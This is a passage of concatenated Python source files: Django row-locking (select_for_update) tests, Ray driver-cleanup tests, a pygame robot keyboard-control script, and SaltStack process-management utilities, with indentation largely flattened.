NotSupportedError is raised if a SELECT...FOR UPDATE NOWAIT is run on
a database backend that supports FOR UPDATE but not NOWAIT.
"""
with self.assertRaisesMessage(NotSupportedError, 'NOWAIT is not supported on this database backend.'):
with transaction.atomic():
Person.objects.select_for_update(nowait=True).get()
@skipIfDBFeature('has_select_for_update_skip_locked')
@skipUnlessDBFeature('has_select_for_update')
def test_unsupported_skip_locked_raises_error(self):
"""
NotSupportedError is raised if a SELECT...FOR UPDATE SKIP LOCKED is run
on a database backend that supports FOR UPDATE but not SKIP LOCKED.
"""
with self.assertRaisesMessage(NotSupportedError, 'SKIP LOCKED is not supported on this database backend.'):
with transaction.atomic():
Person.objects.select_for_update(skip_locked=True).get()
@skipIfDBFeature('has_select_for_update_of')
@skipUnlessDBFeature('has_select_for_update')
def test_unsupported_of_raises_error(self):
"""
NotSupportedError is raised if a SELECT...FOR UPDATE OF... is run on
a database backend that supports FOR UPDATE but not OF.
"""
msg = 'FOR UPDATE OF is not supported on this database backend.'
with self.assertRaisesMessage(NotSupportedError, msg):
with transaction.atomic():
Person.objects.select_for_update(of=('self',)).get()
@skipIfDBFeature('has_select_for_no_key_update')
@skipUnlessDBFeature('has_select_for_update')
def test_unsupported_no_key_raises_error(self):
"""
NotSupportedError is raised if a SELECT...FOR NO KEY UPDATE... is run
on a database backend that supports FOR UPDATE but not NO KEY.
"""
msg = 'FOR NO KEY UPDATE is not supported on this database backend.'
with self.assertRaisesMessage(NotSupportedError, msg):
with transaction.atomic():
Person.objects.select_for_update(no_key=True).get()
@skipUnlessDBFeature('has_select_for_update', 'has_select_for_update_of')
def test_unrelated_of_argument_raises_error(self):
"""
FieldError is raised if a non-relation field is specified in of=(...).
"""
msg = (
'Invalid field name(s) given in select_for_update(of=(...)): %s. '
'Only relational fields followed in the query are allowed. '
'Choices are: self, born, born__country, '
'born__country__entity_ptr.'
)
invalid_of = [
('nonexistent',),
('name',),
('born__nonexistent',),
('born__name',),
('born__nonexistent', 'born__name'),
]
for of in invalid_of:
with self.subTest(of=of):
with self.assertRaisesMessage(FieldError, msg % ', '.join(of)):
with transaction.atomic():
Person.objects.select_related('born__country').select_for_update(of=of).get()
@skipUnlessDBFeature('has_select_for_update', 'has_select_for_update_of')
def test_related_but_unselected_of_argument_raises_error(self):
"""
FieldError is raised if a relation field that is not followed in the
query is specified in of=(...).
"""
msg = (
'Invalid field name(s) given in select_for_update(of=(...)): %s. '
'Only relational fields followed in the query are allowed. '
'Choices are: self, born, profile.'
)
for name in ['born__country', 'died', 'died__country']:
with self.subTest(name=name):
with self.assertRaisesMessage(FieldError, msg % name):
with transaction.atomic():
Person.objects.select_related(
'born', 'profile',
).exclude(profile=None).select_for_update(of=(name,)).get()
@skipUnlessDBFeature('has_select_for_update', 'has_select_for_update_of')
def test_model_inheritance_of_argument_raises_error_ptr_in_choices(self):
msg = (
'Invalid field name(s) given in select_for_update(of=(...)): '
'name. Only relational fields followed in the query are allowed. '
'Choices are: self, %s.'
)
with self.assertRaisesMessage(
FieldError,
msg % 'country, country__country_ptr, country__country_ptr__entity_ptr',
):
with transaction.atomic():
EUCity.objects.select_related(
'country',
).select_for_update(of=('name',)).get()
with self.assertRaisesMessage(FieldError, msg % 'country_ptr, country_ptr__entity_ptr'):
with transaction.atomic():
EUCountry.objects.select_for_update(of=('name',)).get()
@skipUnlessDBFeature('has_select_for_update', 'has_select_for_update_of')
def test_model_proxy_of_argument_raises_error_proxy_field_in_choices(self):
msg = (
'Invalid field name(s) given in select_for_update(of=(...)): '
'name. Only relational fields followed in the query are allowed. '
'Choices are: self, country, country__entity_ptr.'
)
with self.assertRaisesMessage(FieldError, msg):
with transaction.atomic():
CityCountryProxy.objects.select_related(
'country',
).select_for_update(of=('name',)).get()
@skipUnlessDBFeature('has_select_for_update', 'has_select_for_update_of')
def test_reverse_one_to_one_of_arguments(self):
"""
Reverse OneToOneFields may be included in of=(...) as long as NULLs
are excluded because LEFT JOIN isn't allowed in SELECT FOR UPDATE.
"""
with transaction.atomic():
person = Person.objects.select_related(
'profile',
).exclude(profile=None).select_for_update(of=('profile',)).get()
self.assertEqual(person.profile, self.person_profile)
@skipUnlessDBFeature('has_select_for_update')
def test_for_update_after_from(self):
features_class = connections['default'].features.__class__
attribute_to_patch = "%s.%s.for_update_after_from" % (features_class.__module__, features_class.__name__)
with mock.patch(attribute_to_patch, return_value=True):
with transaction.atomic():
self.assertIn('FOR UPDATE WHERE', str(Person.objects.filter(name='foo').select_for_update().query))
@skipUnlessDBFeature('has_select_for_update')
def test_for_update_requires_transaction(self):
"""
A TransactionManagementError is raised
when a select_for_update query is executed outside of a transaction.
"""
msg = 'select_for_update cannot be used outside of a transaction.'
with self.assertRaisesMessage(transaction.TransactionManagementError, msg):
list(Person.objects.all().select_for_update())
@skipUnlessDBFeature('has_select_for_update')
def test_for_update_requires_transaction_only_in_execution(self):
"""
No TransactionManagementError is raised
when select_for_update is invoked outside of a transaction -
only when the query is executed.
"""
people = Person.objects.all().select_for_update()
msg = 'select_for_update cannot be used outside of a transaction.'
with self.assertRaisesMessage(transaction.TransactionManagementError, msg):
list(people)
@skipUnlessDBFeature('supports_select_for_update_with_limit')
def test_select_for_update_with_limit(self):
other = Person.objects.create(name='Grappeli', born=self.city1, died=self.city2)
with transaction.atomic():
qs = list(Person.objects.all().order_by('pk').select_for_update()[1:2])
self.assertEqual(qs[0], other)
@skipIfDBFeature('supports_select_for_update_with_limit')
def test_unsupported_select_for_update_with_limit(self):
msg = 'LIMIT/OFFSET is not supported with select_for_update on this database backend.'
with self.assertRaisesMessage(NotSupportedError, msg):
with transaction.atomic():
list(Person.objects.all().order_by('pk').select_for_update()[1:2])
def run_select_for_update(self, status, **kwargs):
"""
Utility method that runs a SELECT FOR UPDATE against all
Person instances. After the select_for_update, it attempts
to update the name of the only record, save, and commit.
This function expects to run in a separate thread.
"""
status.append('started')
try:
# We need to enter transaction management again, as this is done on
# per-thread basis
with transaction.atomic():
person = Person.objects.select_for_update(**kwargs).get()
person.name = 'Fred'
person.save()
except (DatabaseError, Person.DoesNotExist) as e:
status.append(e)
finally:
# This method is run in a separate thread. It uses its own
# database connection. Close it without waiting for the GC.
connection.close()
@skipUnlessDBFeature('has_select_for_update')
@skipUnlessDBFeature('supports_transactions')
def test_block(self):
"""
A thread running a select_for_update that accesses rows being touched
by a similar operation on another connection blocks correctly.
"""
# First, let's start the transaction in our thread.
self.start_blocking_transaction()
# Now, try it again using the ORM's select_for_update
# facility. Do this in a separate thread.
status = []
thread = threading.Thread(
target=self.run_select_for_update, args=(status,)
)
# The thread should immediately block, but we'll sleep
# for a bit to make sure.
thread.start()
sanity_count = 0
while len(status) != 1 and sanity_count < 10:
sanity_count += 1
time.sleep(1)
if sanity_count >= 10:
raise ValueError('Thread did not run and block')
# Check the person hasn't been updated. Since this isn't
# using FOR UPDATE, it won't block.
p = Person.objects.get(pk=self.person.pk)
self.assertEqual('Reinhardt', p.name)
# When we end our blocking transaction, our thread should
# be able to continue.
self.end_blocking_transaction()
thread.join(5.0)
# Check the thread has finished. Assuming it has, we should
# find that it has updated the person's name.
self.assertFalse(thread.is_alive())
# We must commit the transaction to ensure that MySQL gets a fresh read,
# since by default it runs in REPEATABLE READ mode
transaction.commit()
p = Person.objects.get(pk=self.person.pk)
self.assertEqual('Fred', p.name)
@skipUnlessDBFeature('has_select_for_update')
def test_raw_lock_not_available(self):
"""
Running a raw query which can't obtain a FOR UPDATE lock raises
the correct exception
"""
self.start_blocking_transaction()
def raw(status):
try:
list(
Person.objects.raw(
'SELECT * FROM %s %s' % (
Person._meta.db_table,
connection.ops.for_update_sql(nowait=True)
)
)
)
except DatabaseError as e:
status.append(e)
finally:
# This method is run in a separate thread. It uses its own
# database connection. Close it without waiting for the GC.
# Connection cannot be closed on Oracle because cursor is still
# open.
if connection.vendor != 'oracle':
connection.close()
status = []
thread = threading.Thread(target=raw, kwargs={'status': status})
thread.start()
time.sleep(1)
thread.join()
self.end_blocking_transaction()
self.assertIsInstance(status[-1], DatabaseError)
@skipUnlessDBFeature('has_select_for_update')
@override_settings(DATABASE_ROUTERS=[TestRouter()])
def test_select_for_update_on_multidb(self):
query = Person.objects.select_for_update()
self.assertEqual(router.db_for_write(Person), query.db)
@skipUnlessDBFeature('has_select_for_update')
def test_select_for_update_with_get(self):
with transaction.atomic():
person = Person.objects.select_for_update().get(name='Reinhardt')
self.assertEqual(person.name, 'Reinhardt')
def test_nowait_and_skip_locked(self):
with self.assertRaisesMessage(ValueError, 'The nowait option cannot be used with skip_locked.'):
Person.objects.select_for_update(nowait=True, skip_locked=True)
def test_ordered_select_for_update(self):
"""
Subqueries should respect ordering as an ORDER BY clause may be useful
to specify a row locking order to prevent deadlocks (#27193).
"""
with transaction.atomic():
qs = Person.objects.filter(id__in=Person.objects.order_by('-id').select_for_update())
self.assertIn('ORDER BY', str(qs.query))
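# The tests above verify select_for_update() behaviour through raw SQL captures
# and competing threads; in application code the same row-locking pattern is a
# single queryset call inside an atomic block. A minimal sketch, illustrative
# only and reusing the Person model imported by this test module:
def rename_person_locked(pk, new_name):
    """Illustrative only: update a row while holding a SELECT ... FOR UPDATE lock."""
    with transaction.atomic():
        # The row stays locked until the atomic block commits or rolls back.
        person = Person.objects.select_for_update().get(pk=pk)
        person.name = new_name
        person.save()
        return person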
|
test_monitors.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import multiprocessing
import os
import pytest
import subprocess
import time
import ray
from ray.tests.utils import run_and_get_output
def _test_cleanup_on_driver_exit(num_redis_shards):
stdout = run_and_get_output([
"ray",
"start",
"--head",
"--num-redis-shards",
str(num_redis_shards),
])
lines = [m.strip() for m in stdout.split("\n")]
init_cmd = [m for m in lines if m.startswith("ray.init")]
assert 1 == len(init_cmd)
redis_address = init_cmd[0].split("redis_address=\"")[-1][:-2]
max_attempts_before_failing = 100
# Wait for monitor.py to start working.
time.sleep(2)
def StateSummary():
obj_tbl_len = len(ray.global_state.object_table())
task_tbl_len = len(ray.global_state.task_table())
func_tbl_len = len(ray.global_state.function_table())
return obj_tbl_len, task_tbl_len, func_tbl_len
def Driver(success):
success.value = True
# Start driver.
ray.init(redis_address=redis_address)
summary_start = StateSummary()
if (0, 1) != summary_start[:2]:
success.value = False
# Two new objects.
ray.get(ray.put(1111))
ray.get(ray.put(1111))
attempts = 0
while (2, 1, summary_start[2]) != StateSummary():
time.sleep(0.1)
attempts += 1
if attempts == max_attempts_before_failing:
success.value = False
break
@ray.remote
def f():
ray.put(1111) # Yet another object.
return 1111 # A returned object as well.
# 1 new function.
attempts = 0
while (2, 1, summary_start[2] + 1) != StateSummary():
time.sleep(0.1)
attempts += 1
if attempts == max_attempts_before_failing:
success.value = False
break
ray.get(f.remote())
attempts = 0
while (4, 2, summary_start[2] + 1) != StateSummary():
time.sleep(0.1)
attempts += 1
if attempts == max_attempts_before_failing:
success.value = False
break
ray.shutdown()
success = multiprocessing.Value('b', False)
driver = multiprocessing.Process(target=Driver, args=(success, ))
driver.start()
# Wait for client to exit.
driver.join()
# Just make sure Driver() is run and succeeded.
assert success.value
# Check that objects, tasks, and functions are cleaned up.
ray.init(redis_address=redis_address)
attempts = 0
while (0, 1) != StateSummary()[:2]:
time.sleep(0.1)
attempts += 1
if attempts == max_attempts_before_failing:
break
assert (0, 1) == StateSummary()[:2]
ray.shutdown()
subprocess.Popen(["ray", "stop"]).wait()
@pytest.mark.skipif(
os.environ.get("RAY_USE_NEW_GCS") == "on",
reason="Hanging with the new GCS API.")
def test_cleanup_on_driver_exit_single_redis_shard():
_test_cleanup_on_driver_exit(num_redis_shards=1)
@pytest.mark.skipif(
os.environ.get("RAY_USE_NEW_GCS") == "on",
reason="Hanging with the new GCS API.")
def test_cleanup_on_driver_exit_many_redis_shards():
_test_cleanup_on_driver_exit(num_redis_shards=5)
_test_cleanup_on_driver_exit(num_redis_shards=31)
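# Both Driver() and the post-exit check above poll StateSummary() with a bounded
# number of attempts. That bounded-polling idiom is captured as a small helper
# below, for illustration only; it is not part of the original test, and the
# defaults mirror max_attempts_before_failing used above.
def wait_until(predicate, attempts=100, delay=0.1):
    """Illustrative only: poll predicate() until it returns True or attempts run out."""
    for _ in range(attempts):
        if predicate():
            return True
        time.sleep(delay)
    return False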
|
keyboard_ctrl.py
|
"""
使用键盘控制机器人
- a/s/d/f: 移动
- q/e: 转向
"""
import sys
import os
import numpy as np
import pygame
import time
import threading
# add parent directory to import path
sys.path.append(os.path.split(os.path.abspath(os.path.dirname(__file__)))[0])
import rmepy
MOVE_SPEED = 1.5
ROTATE_SPEED = 600
CMD_SEND_FREQ = 60
THRESHOLD = 50
running = True
r = rmepy.Robot()
r.start()
r.video.start()
time.sleep(0.1)
# r.video.log.level = 'INFO'
r.connection.log.level = 'WARNING'
speed = (0, 0, 0)
def key_handler(k):
global running, speed
speed = [0, 0, 0]
if k[pygame.K_w]:
# forward
speed[0] = MOVE_SPEED
if k[pygame.K_s]:
# back
speed[0] = -MOVE_SPEED
if k[pygame.K_d]:
# right
speed[1] = -MOVE_SPEED
if k[pygame.K_a]:
# left
speed[1] = MOVE_SPEED
if k[pygame.K_ESCAPE]:
# exit
running = False
speed[2] = min(max(-pygame.mouse.get_rel()[0], -THRESHOLD), THRESHOLD) / THRESHOLD * ROTATE_SPEED
def ctrl_task():
global speed
while running:
r.chassis.set_speed(*speed)
time.sleep(1/CMD_SEND_FREQ)
if __name__ == "__main__":
ctrl_thread = threading.Thread(target=ctrl_task)
ctrl_thread.start()
pygame.init()
display = pygame.display.set_mode((1080, 720))
clock = pygame.time.Clock()
pygame.event.set_grab(True)
pygame.mouse.set_visible(False)
update_frame = True
while running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
keys = pygame.key.get_pressed()
key_handler(keys)
# Draw image
if update_frame:
temp = r.video.get_frame(timeout=1)
if temp is not None:
frame = np.rot90(temp, 1)
surf = pygame.surfarray.make_surface(frame)
display.blit(surf, (0, 0))
pygame.display.flip()
update_frame = not update_frame
clock.tick(65)
pygame.quit()
|
process.py
|
"""
Functions for daemonizing and otherwise modifying running processes
"""
import contextlib
import copy
import errno
import functools
import inspect
import io
import json
import logging
import multiprocessing
import multiprocessing.util
import os
import queue
import signal
import socket
import subprocess
import sys
import threading
import time
import salt.defaults.exitcodes
import salt.log.setup
import salt.utils.files
import salt.utils.path
import salt.utils.platform
import salt.utils.versions
from salt.ext.tornado import gen
log = logging.getLogger(__name__)
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
try:
import setproctitle
HAS_SETPROCTITLE = True
except ImportError:
HAS_SETPROCTITLE = False
def appendproctitle(name):
"""
Append "name" to the current process title
"""
if HAS_SETPROCTITLE:
current = setproctitle.getproctitle()
if current.strip().endswith("MainProcess"):
current, _ = current.rsplit("MainProcess", 1)
setproctitle.setproctitle("{} {}".format(current.rstrip(), name))
def daemonize(redirect_out=True):
"""
Daemonize a process
"""
# Avoid circular import
import salt.utils.crypt
try:
pid = os.fork()
if pid > 0:
# exit first parent
salt.utils.crypt.reinit_crypto()
os._exit(salt.defaults.exitcodes.EX_OK)
except OSError as exc:
log.error("fork #1 failed: %s (%s)", exc.errno, exc)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# decouple from parent environment
os.chdir("/")
# noinspection PyArgumentList
os.setsid()
os.umask(0o022) # pylint: disable=blacklisted-function
# do second fork
try:
pid = os.fork()
if pid > 0:
salt.utils.crypt.reinit_crypto()
sys.exit(salt.defaults.exitcodes.EX_OK)
except OSError as exc:
log.error("fork #2 failed: %s (%s)", exc.errno, exc)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
salt.utils.crypt.reinit_crypto()
# A normal daemonization redirects the process output to /dev/null.
# Unfortunately, when a Python multiprocessing process is started, the
# output is not cleanly redirected and the parent process dies when the
# multiprocessing process attempts to access stdout or err.
if redirect_out:
with salt.utils.files.fopen("/dev/null", "r+") as dev_null:
# Redirect python stdin/out/err
# and the os stdin/out/err which can be different
dup2(dev_null, sys.stdin)
dup2(dev_null, sys.stdout)
dup2(dev_null, sys.stderr)
dup2(dev_null, 0)
dup2(dev_null, 1)
dup2(dev_null, 2)
def dup2(file1, file2):
"""
Duplicate file descriptor fd to fd2, closing the latter first if necessary.
This method is similar to os.dup2 but ignores streams that do not have a
supported fileno method.
"""
if isinstance(file1, int):
fno1 = file1
else:
try:
fno1 = file1.fileno()
except io.UnsupportedOperation:
log.warning("Unsupported operation on file: %r", file1)
return
if isinstance(file2, int):
fno2 = file2
else:
try:
fno2 = file2.fileno()
except io.UnsupportedOperation:
log.warning("Unsupported operation on file: %r", file2)
return
os.dup2(fno1, fno2)
def daemonize_if(opts):
"""
Daemonize a module function process if multiprocessing is True and the
process is not being called by salt-call
"""
if "salt-call" in sys.argv[0]:
return
if not opts.get("multiprocessing", True):
return
if sys.platform.startswith("win"):
return
daemonize(False)
def systemd_notify_call(action):
process = subprocess.Popen(
["systemd-notify", action], stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
process.communicate()
status = process.poll()
return status == 0
def notify_systemd():
"""
Notify systemd that this process has started
"""
try:
import systemd.daemon # pylint: disable=no-name-in-module
except ImportError:
if salt.utils.path.which("systemd-notify") and systemd_notify_call("--booted"):
# Notify systemd synchronously
notify_socket = os.getenv("NOTIFY_SOCKET")
if notify_socket:
# Handle abstract namespace socket
if notify_socket.startswith("@"):
notify_socket = "\0{}".format(notify_socket[1:])
try:
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.connect(notify_socket)
sock.sendall(b"READY=1")
sock.close()
except OSError:
return systemd_notify_call("--ready")
return True
return False
if systemd.daemon.booted():
try:
return systemd.daemon.notify("READY=1")
except SystemError:
# Daemon was not started by systemd
pass
def get_process_info(pid=None):
"""
Gets basic info about a process.
pid: None, or int: None will get the current process pid
Return: None or Dict
"""
if pid is None:
pid = os.getpid()
elif not psutil.pid_exists(pid):
return
raw_process_info = psutil.Process(pid)
# pid_exists can have false positives
# for example Windows reserves PID 5 in a hacky way
# another reason is that the process requires kernel permissions
try:
raw_process_info.status()
except psutil.NoSuchProcess:
return None
return {
"pid": raw_process_info.pid,
"name": raw_process_info.name(),
"start_time": raw_process_info.create_time(),
}
def claim_mantle_of_responsibility(file_name):
"""
Checks that no other live process has this responsibility.
If claiming the mantle of responsibility was successful, True will be returned.
file_name: str
Return: bool
"""
# all OSs supported by salt have psutil
if not HAS_PSUTIL:
log.critical(
"Assuming no other Process has this responsibility! pidfile: %s", file_name
)
return True
# add file directory if missing
file_directory_name = os.path.dirname(file_name)
if not os.path.isdir(file_directory_name) and file_directory_name:
os.makedirs(file_directory_name)
# get process info from file
file_process_info = None
try:
with salt.utils.files.fopen(file_name, "r") as file:
file_process_info = json.load(file)
except json.decoder.JSONDecodeError:
log.error("pidfile: %s is corrupted", file_name)
except FileNotFoundError:
log.info("pidfile: %s not found", file_name)
this_process_info = get_process_info()
# check if this process already has the responsibility
if file_process_info == this_process_info:
return True
if not isinstance(file_process_info, dict) or not isinstance(
file_process_info.get("pid"), int
):
file_process_info = None
# check if process is still alive
if isinstance(file_process_info, dict) and file_process_info == get_process_info(
file_process_info.get("pid")
):
return False
# process can take the mantle of responsibility
with salt.utils.files.fopen(file_name, "w") as file:
json.dump(this_process_info, file)
return True
def check_mantle_of_responsibility(file_name):
"""
Sees who has the mantle of responsibility
file_name: str
Return: None or int
"""
# all OSs supported by salt have psutil
if not HAS_PSUTIL:
log.critical(
"Assuming no other Process has this responsibility! pidfile: %s", file_name
)
return
# get process info from file
try:
with salt.utils.files.fopen(file_name, "r") as file:
file_process_info = json.load(file)
except json.decoder.JSONDecodeError:
log.error("pidfile: %s is corrupted", file_name)
return
except FileNotFoundError:
log.info("pidfile: %s not found", file_name)
return
if not isinstance(file_process_info, dict) or not isinstance(
file_process_info.get("pid"), int
):
return
if file_process_info == get_process_info(file_process_info["pid"]):
return file_process_info["pid"]
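# Taken together, claim_mantle_of_responsibility() and
# check_mantle_of_responsibility() implement a pidfile-based "single live owner"
# check. A usage sketch, illustrative only (the pidfile path and the exclusive
# work function are assumptions):
#
#     pidfile = "/var/run/salt/my-responsibility.pid"
#     if claim_mantle_of_responsibility(pidfile):
#         run_exclusive_work()  # hypothetical function
#     else:
#         owner = check_mantle_of_responsibility(pidfile)
#         log.info("Responsibility already held by pid %s", owner)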
def set_pidfile(pidfile, user):
"""
Save the pidfile
"""
pdir = os.path.dirname(pidfile)
if not os.path.isdir(pdir) and pdir:
os.makedirs(pdir)
try:
with salt.utils.files.fopen(pidfile, "w+") as ofile:
ofile.write(str(os.getpid()))
except OSError:
pass
log.debug("Created pidfile: %s", pidfile)
if salt.utils.platform.is_windows():
return True
import pwd # after confirming not running Windows
# import grp
try:
pwnam = pwd.getpwnam(user)
uid = pwnam[2]
gid = pwnam[3]
# groups = [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
except (KeyError, IndexError):
sys.stderr.write(
"Failed to set the pid to user: {}. The user is not available.\n".format(
user
)
)
sys.exit(salt.defaults.exitcodes.EX_NOUSER)
if os.getuid() == uid:
# The current user already owns the pidfile. Return!
return
try:
os.chown(pidfile, uid, gid)
except OSError as err:
msg = "Failed to set the ownership of PID file {} to user {}.".format(
pidfile, user
)
log.debug("%s Traceback follows:", msg, exc_info=True)
sys.stderr.write("{}\n".format(msg))
sys.exit(err.errno)
log.debug("Chowned pidfile: %s to user: %s", pidfile, user)
def check_pidfile(pidfile):
"""
Determine if a pidfile has been written out
"""
return os.path.isfile(pidfile)
def get_pidfile(pidfile):
"""
Return the pid from a pidfile as an integer
"""
try:
with salt.utils.files.fopen(pidfile) as pdf:
pid = pdf.read().strip()
return int(pid)
except (OSError, TypeError, ValueError):
return -1
def clean_proc(proc, wait_for_kill=10):
"""
Generic method for cleaning up multiprocessing procs
"""
# NoneType and other fun stuff need not apply
if not proc:
return
try:
waited = 0
while proc.is_alive():
proc.terminate()
waited += 1
time.sleep(0.1)
if proc.is_alive() and (waited >= wait_for_kill):
log.error("Process did not die with terminate(): %s", proc.pid)
os.kill(proc.pid, signal.SIGKILL)
except (AssertionError, AttributeError):
# Catch AssertionError when the proc is evaluated inside the child
# Catch AttributeError when the process dies between proc.is_alive()
# and proc.terminate() and turns into a NoneType
pass
def os_is_running(pid):
"""
Use OS facilities to determine if a process is running
"""
if isinstance(pid, str):
pid = int(pid)
if HAS_PSUTIL:
return psutil.pid_exists(pid)
else:
try:
os.kill(pid, 0) # SIG 0 is the "are you alive?" signal
return True
except OSError:
return False
class ThreadPool:
"""
This is a very VERY basic threadpool implementation
This was made instead of using multiprocessing ThreadPool because
we want to set max queue size and we want to daemonize threads (neither
is exposed in the stdlib version).
Since there isn't much use for this class as of right now, this implementation
only supports daemonized threads and will *not* return results
TODO: if this is found to be more generally useful it would be nice to pull
in the majority of code from upstream or from http://bit.ly/1wTeJtM
"""
def __init__(self, num_threads=None, queue_size=0):
# if no count passed, default to number of CPUs
if num_threads is None:
num_threads = multiprocessing.cpu_count()
self.num_threads = num_threads
# create a task queue of queue_size
self._job_queue = queue.Queue(queue_size)
self._workers = []
# create worker threads
for _ in range(num_threads):
thread = threading.Thread(target=self._thread_target)
thread.daemon = True
thread.start()
self._workers.append(thread)
# intentionally not called "apply_async" since we aren't keeping track of
# the return at all, if we want to make this API compatible with multiprocessing
# threadpool we can in the future, and we won't have to worry about name collision
def fire_async(self, func, args=None, kwargs=None):
if args is None:
args = []
if kwargs is None:
kwargs = {}
try:
self._job_queue.put_nowait((func, args, kwargs))
return True
except queue.Full:
return False
def _thread_target(self):
while True:
# 1s timeout so that if the parent dies this thread will die within 1s
try:
try:
func, args, kwargs = self._job_queue.get(timeout=1)
self._job_queue.task_done() # Mark the task as done once we get it
except queue.Empty:
continue
except AttributeError:
# During shutdown, `queue` may not have an `Empty` attribute. Thus,
# we have to catch a possible exception from our exception handler in
# order to avoid an unclean shutdown. Le sigh.
continue
try:
log.debug(
"ThreadPool executing func: %s with args=%s kwargs=%s",
func,
args,
kwargs,
)
func(*args, **kwargs)
except Exception as err: # pylint: disable=broad-except
log.debug(err, exc_info=True)
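# A usage sketch for the ThreadPool above, illustrative only (the worker call is
# an assumption): fire_async() returns False when the bounded queue is full, so
# callers are expected to handle or drop rejected work themselves.
#
#     pool = ThreadPool(num_threads=4, queue_size=10)
#     accepted = pool.fire_async(log.debug, args=["work item %s", 1])
#     if not accepted:
#         log.warning("ThreadPool queue is full; work item dropped")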
class ProcessManager:
"""
A class which will manage processes that should be running
"""
def __init__(self, name=None, wait_for_kill=1):
# pid -> {tgt: foo, Process: object, args: args, kwargs: kwargs}
self._process_map = {}
self.name = name
if self.name is None:
self.name = self.__class__.__name__
self.wait_for_kill = wait_for_kill
# store some pointers for the SIGTERM handler
self._pid = os.getpid()
self._sigterm_handler = signal.getsignal(signal.SIGTERM)
self._restart_processes = True
def add_process(self, tgt, args=None, kwargs=None, name=None):
"""
Create a process with args + kwargs
This will determine if tgt is a Process class; otherwise it assumes
it is a function
"""
if args is None:
args = []
if kwargs is None:
kwargs = {}
if inspect.isclass(tgt) and issubclass(tgt, multiprocessing.Process):
kwargs["name"] = name or tgt.__qualname__
process = tgt(*args, **kwargs)
else:
process = Process(
target=tgt, args=args, kwargs=kwargs, name=name or tgt.__qualname__
)
if isinstance(process, SignalHandlingProcess):
with default_signals(signal.SIGINT, signal.SIGTERM):
process.start()
else:
process.start()
log.debug("Started '%s' with pid %s", process.name, process.pid)
self._process_map[process.pid] = {
"tgt": tgt,
"args": args,
"kwargs": kwargs,
"Process": process,
}
return process
def restart_process(self, pid):
"""
Create new process (assuming this one is dead), then remove the old one
"""
if self._restart_processes is False:
return
exit = self._process_map[pid]["Process"].exitcode
if exit > 0:
log.info(
"Process %s (%s) died with exit status %s, restarting...",
self._process_map[pid]["tgt"],
pid,
self._process_map[pid]["Process"].exitcode,
)
else:
log.debug(
"Process %s (%s) died with exit status %s, restarting...",
self._process_map[pid]["tgt"],
pid,
self._process_map[pid]["Process"].exitcode,
)
# don't block, the process is already dead
self._process_map[pid]["Process"].join(1)
self.add_process(
self._process_map[pid]["tgt"],
self._process_map[pid]["args"],
self._process_map[pid]["kwargs"],
)
del self._process_map[pid]
def stop_restarting(self):
self._restart_processes = False
def send_signal_to_processes(self, signal_):
if salt.utils.platform.is_windows() and signal_ in (
signal.SIGTERM,
signal.SIGINT,
):
# On Windows, the subprocesses automatically have their signal
# handlers invoked. If you send one of these signals while the
# signal handler is running, it will kill the process where it
# is currently running and the signal handler will not finish.
# This will also break the process tree: children of killed
# children will become parentless and not findable when trying
# to kill the process tree (they don't inherit their parent's
# parent). Hence the 'MWorker' processes would be left over if
# the 'ReqServer' process is killed this way since 'taskkill'
# with the tree option will not be able to find them.
return
for pid in self._process_map.copy().keys():
try:
os.kill(pid, signal_)
except OSError as exc:
if exc.errno not in (errno.ESRCH, errno.EACCES):
# If it's not a "No such process" error, raise it
raise
# Otherwise, it's a dead process, remove it from the process map
del self._process_map[pid]
@gen.coroutine
def run(self, asynchronous=False):
"""
Load and start all available api modules
"""
log.debug("Process Manager starting!")
if multiprocessing.current_process().name != "MainProcess":
appendproctitle(self.name)
# make sure to kill the subprocesses if the parent is killed
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# There are no SIGTERM handlers installed, install ours
signal.signal(signal.SIGTERM, self._handle_signals)
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# There are no SIGINT handlers installed, install ours
signal.signal(signal.SIGINT, self._handle_signals)
while True:
log.trace("Process manager iteration")
try:
# in case someone died while we were waiting...
self.check_children()
# The event-based subprocesses management code was removed from here
# because os.wait() conflicts with the subprocesses management logic
# implemented in `multiprocessing` package. See #35480 for details.
if asynchronous:
yield gen.sleep(10)
else:
time.sleep(10)
if not self._process_map:
break
# OSError is raised if a signal handler is called (SIGTERM) during os.wait
except OSError:
break
except OSError as exc: # pylint: disable=duplicate-except
# IOError with errno of EINTR (4) may be raised
# when using time.sleep() on Windows.
if exc.errno != errno.EINTR:
raise
break
def check_children(self):
"""
Check the children once
"""
if self._restart_processes is True:
for pid, mapping in self._process_map.copy().items():
if not mapping["Process"].is_alive():
log.trace("Process restart of %s", pid)
self.restart_process(pid)
def kill_children(self, *args, **kwargs):
"""
Kill all of the children
"""
if salt.utils.platform.is_windows():
if multiprocessing.current_process().name != "MainProcess":
# Since the main process will kill subprocesses by tree,
# no need to do anything in the subprocesses.
# Sometimes, when both a subprocess and the main process
# call 'taskkill', it will leave a 'taskkill' zombie process.
# We want to avoid this.
return
with salt.utils.files.fopen(os.devnull, "wb") as devnull:
for pid, p_map in self._process_map.items():
# On Windows, we need to explicitly terminate sub-processes
# because the processes don't have a sigterm handler.
subprocess.call(
["taskkill", "/F", "/T", "/PID", str(pid)],
stdout=devnull,
stderr=devnull,
)
p_map["Process"].terminate()
else:
for pid, p_map in self._process_map.copy().items():
log.trace("Terminating pid %s: %s", pid, p_map["Process"])
if args:
# escalate the signal to the process
try:
os.kill(pid, args[0])
except OSError:
pass
try:
p_map["Process"].terminate()
except OSError as exc:
if exc.errno not in (errno.ESRCH, errno.EACCES):
raise
if not p_map["Process"].is_alive():
try:
del self._process_map[pid]
except KeyError:
# Race condition
pass
end_time = time.time() + self.wait_for_kill # when to die
log.trace("Waiting to kill process manager children")
while self._process_map and time.time() < end_time:
for pid, p_map in self._process_map.copy().items():
log.trace("Joining pid %s: %s", pid, p_map["Process"])
p_map["Process"].join(0)
if not p_map["Process"].is_alive():
# The process is no longer alive, remove it from the process map dictionary
try:
del self._process_map[pid]
except KeyError:
# This is a race condition if a signal was passed to all children
pass
# if any managed processes still remain to be handled, let's kill them
